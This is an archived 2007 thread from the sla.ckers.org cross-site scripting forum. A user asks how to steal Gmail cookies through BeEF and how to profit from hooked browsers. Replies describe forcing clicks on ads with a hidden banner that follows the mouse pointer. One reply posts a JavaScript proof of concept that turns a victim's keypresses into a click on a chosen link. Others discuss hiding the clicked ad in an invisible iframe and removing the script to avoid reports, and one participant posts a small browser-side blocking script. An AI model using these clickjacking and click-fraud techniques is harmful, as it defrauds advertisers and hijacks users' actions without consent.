Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
beef shell
Posted by: lobas
Date: January 15, 2007 07:49AM

Via beef if you have infected a page the victim is browsing for instance

http://attacker.com

can you soom how with the javascript command
load http://gmail.google.com//
into a hidden iframe then steal the cookie
ive had to sucesswith this,

im guess u need a xss on gmail

Options: ReplyQuote
Re: beef shell
Posted by: Tribute
Date: January 15, 2007 08:20AM

You'd need an XSS on google as you can't grab contents from iframes that are on a different domain as to what you're page containing the iframe is on.

Options: ReplyQuote
Re: beef shell
Posted by: lobas
Date: January 15, 2007 11:26AM

alot of these tools also say for fun and for profit i dont see the profit bit where that takes places? u cant exactly click adds with them

Options: ReplyQuote
Re: beef shell
Posted by: rsnake
Date: January 15, 2007 05:17PM

There is lots of profit depending on what you want to do. Forcing people to click on ads instead of the other links on a page is simple enough, but more likely phishing, stealing account information to sell on the street, industrial espionage, etc... etc...

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: beef shell
Posted by: lobas
Date: January 15, 2007 05:31PM

hmm i dont think its possible to force them to click the adds you cant control mouse or clicks via browser ?

Options: ReplyQuote
Re: beef shell
Posted by: rsnake
Date: January 15, 2007 10:07PM

no, but you can put your banner immediately below the mouse pointer as it moves in JavaScript. :)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: beef shell
Posted by: lobas
Date: January 16, 2007 04:10AM

you have code for this?, can u show me please ive only ever doe this with a search box never been able to do it with anything else

Options: ReplyQuote
Re: beef shell
Posted by: hasse
Date: January 16, 2007 09:22AM

lobas Wrote:
-------------------------------------------------------
> alot of these tools also say for fun and for
> profit i dont see the profit bit where that takes
> places? u cant exactly click adds with them


Well it's probably just because of the paper "Smashing the stack for fun and profit". Often people just add "for fun and profit" to whatever they created.

Even though you could probably profit from it somehow.



Edited 1 time(s). Last edit at 01/16/2007 09:23AM by hasse.

Options: ReplyQuote
Re: beef shell
Posted by: rsnake
Date: January 16, 2007 06:46PM

Lobas: http://ha.ckers.org/weird/followmouse.html

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: beef shell
Posted by: Kyran
Date: January 16, 2007 07:00PM

"You did it!"

- Kyran

Options: ReplyQuote
Re: beef shell
Posted by: rsnake
Date: January 16, 2007 07:01PM

Improved it to show it can use an iframe. Bewm.

Options: ReplyQuote
Re: beef shell
Posted by: Kyran
Date: January 16, 2007 07:11PM

Always the Opera advocate, I wrote a quick userJS to block the function followmouse. I'll write a more advanced one to remove this sort of thing completely later. I'm moreso just glad that this won't be a big issue for me if I ever find it out in the wild.

window.opera.defineMagicFunction(
'followmouse',
function () {
document.write('followmouse removed')
}
);

- Kyran

Options: ReplyQuote
Re: beef shell
Posted by: rsnake
Date: January 16, 2007 09:19PM

Remind me to code around that when I write hack_kyran.js ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: beef shell
Posted by: Kyran
Date: January 16, 2007 10:03PM

Uh oh.
*adds line to urlfilter.ini*

[exclude]
*/hack_kyran.js

;D

- Kyran

Options: ReplyQuote
Re: beef shell
Posted by: digi7al64
Date: January 17, 2007 12:43AM

nice work rsnake.

i have been trying something similar for sometime with no luck (except the following) which
> Waits for a keydown event and traps it
> Set focus to the link i want clicked
> Converts the keydown keycode into a click (enter)
> returns the keycode to the browser
which then "clicks" the link for me.

POC
<html>
<head>
<script language="JavaScript">
document.onkeydown = ClickIt

function ClickIt(e) {
var keycode;
if (window.event) keycode = window.event.keyCode;
else if (e) keycode = e.which;
{
	document.getElementById("linkage").focus();
	event.keyCode=13; 
	return event.keyCode;
}
}
</script>
</head>
<body>
<a href="http://ha.ckers.org" id="linkage">Hackers</a></div>
</body>
</html>

I have a couple more ideas up my sleeve but that is for another day when i have a better POC

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: beef shell
Posted by: lobas
Date: January 17, 2007 06:26AM

ive tried onload doesnt work though

Options: ReplyQuote
Re: beef shell
Posted by: rsnake
Date: January 17, 2007 02:19PM

I updated the code so it's a little more obvious how it would work.... now it uses a semi-transparent layer, and an image. It's still crappy in IE, but it works great in Firefox. http://ha.ckers.org/weird/followmouse.html

I was having trouble updating the styles in real time so I opted towards a layer with a high opacity. I accidentally messed up at one point and found myself on my own homepage in the iframe (404's point to the homepage) and as a result I almost clicked on a banner ad myself (since they are on the top of the page). It works great, even in tests (at least in Firefox).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: beef shell
Posted by: lobas
Date: January 17, 2007 03:47PM

very cool rsnake, is there anyway once the banner is clicked to not actually open the ad, maybe override the loading page wityh body onload , this method is very easy to get reported

Options: ReplyQuote
Re: beef shell
Posted by: Tribute
Date: January 17, 2007 05:36PM

Couldn't you cause the ad to load in an 1x1px or hidden iframe so that when clicked upon, you see no difference as the page you are on doesn't change?

Options: ReplyQuote
Re: beef shell
Posted by: rsnake
Date: January 17, 2007 06:28PM

lobas, it's in an iframe, so it shouldn't pop anything up... the alert box is there on purpose so you can see what's going on.

Tribute, normally all of that would be hidden. I was just showing the alert box and the semi-visible layer so you could tell what I was doing with the iframe. I guess that's confusing people.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: beef shell
Posted by: Kyran
Date: January 17, 2007 06:29PM

I'm sure you could get it to load in the already hidden iframe and just drop the followmouse function after that.

Edit: Nevermind, rsnake said it better.

- Kyran



Edited 1 time(s). Last edit at 01/17/2007 06:31PM by Kyran.

Options: ReplyQuote
Re: beef shell
Posted by: lobas
Date: January 18, 2007 07:03AM

its a cool method but, for it to be fool proof and not to get reported, somehow the banner, once clicked needs to be opened within 0px/0px iframe hidden, then the script to be diabled, maybe by loading a legit page

Options: ReplyQuote
Re: beef shell
Posted by: rsnake
Date: January 18, 2007 09:25PM

You can't trap the onmousedown event once you are clicking in an iframe as far as I know. So you would be arbitrarily removing it. You can easily hide it from loading because you have control over the div which has the relative opacity built into it. However, you can make it remove the script after a certain amount of time or something, via redirection or a document.write. If they haven't clicked after 10 seconds it's probably safe to assume it's okay to get rid of the script.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.